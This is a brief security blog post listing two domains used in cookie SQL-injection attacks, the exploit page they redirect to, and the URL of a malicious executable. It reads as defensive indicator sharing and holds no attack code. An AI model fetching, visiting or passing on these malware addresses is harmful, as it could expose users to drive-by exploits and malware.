cookie sql-injection domains
these 2 domains are used in the cookie sql-injection attacks
- hanrou7.cn
- me1me.cn
The above 2 domains will iframe to http://www.wow088.com/wang/index.htm where the exploits are located.
The malicious executable is at http://www.wow088.com/wang/ms.exe. The VT analysis is here.
Advertisements
Leave a Reply